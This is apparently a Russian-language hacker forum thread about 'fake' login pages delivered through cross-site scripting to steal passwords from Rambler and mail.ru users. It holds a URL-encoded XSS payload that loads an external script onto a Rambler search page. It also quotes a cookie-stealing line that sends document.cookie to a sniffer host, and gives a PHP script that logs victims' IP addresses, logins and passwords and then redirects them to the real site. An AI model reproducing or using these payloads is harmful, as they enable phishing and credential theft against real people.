Feik - старая пассивная атака, метод подмена странички с формой авторизации. ВОтсь...почему то на этом форуме про фреки не видел. а тем более про их сочетание. Вы даёте ссылку жертве а она авторизируеться и её куда нить перекидывают а пароль и лог записываем. это если смещиват с пассивной XSS А если с активной получаеться весьма неплохо реализовать какую нибудь XSS ...зловредным срипторм сделать форму авторизации...чел псевдо-авторизируеться и перекидываем на что нить такое типа анкеты...чтоб без подозрений. Особенно я думмаю феки актуальны на ресурсах на которых жизнь сессии кукисов очень мала. Или проверка кукисов по айпи и т.п. Примером для такого ресурса стал рамблер кукисы которого перехватить очень сложно т.к. они умерают через кророткое время. Итак представляем фейк с пассивной XSS на рамблере. Да и XSS найденна не мной её кто-то тут выкладывал...непомню автора. http://guap-spb.jino-net.ru/log01.txt
Согласен штука занимательная.... Но всё же лучше сделать редирект не на форму с подменой а на сниффер К примеру.... формочку подобную легко накатать на php, сам такой штукой увлекалсо... Главное что работает.... Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть.... А тем временем значения пароля и логина которые он вбил сохраняютя...
да так и есть всё как ты описал-) "Но всё же лучше сделать редирект не на форму с подменой а на сниффер" С этим несогласен: 1) не какого редиректа нет...посматрел бы хоть 1.js 2)я же писал выше что феик для сайтов где время жизни сессия приписано данной странички и ли вообще очень мало...т.е. перехватывать кукисы бессмывсленно. а ты пишешь - <script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script> 2-й минус - идут кукисы а не пароль. А в данном фреике всё путём - конечно расичтано на неопытного юзера который не будет глядеть в титле и дэкодировать урл-) однако ~70% сразу авторизируються и пароль и логин у меня в логе. =================================== Ещё ращ кто не понял как юзать: даём жертве чей ящик на рамблере - урл: http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E там наша форма авторизации с левым <form action= дальше как жертва авторизировалась её пароль и логин записываеться здесь: http://guap-spb.jino-net.ru/log01.txt
Вот скрипт для фейка маил ру <?php error_reporting(0); $log = "log.txt"; $today = getdate(); $month = $today[month]; $mday = $today[mday]; $year = $today[year]; $current_date = $mday . " " . $month . " " . $year; $fp = fopen($log, "a"); $line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n"; $size = strlen($line); fputs($fp, $line, $size); fclose($fp); header("Location: http://win.mail.ru/cgi-bin/auth"); ?>
да фишка конечно класно только вопрос возник ссылку нужно делать только на явасскрипт или на Php тожоже пойдет? просто сам попробовал на Php ссылку дать нехрена не получаеться...
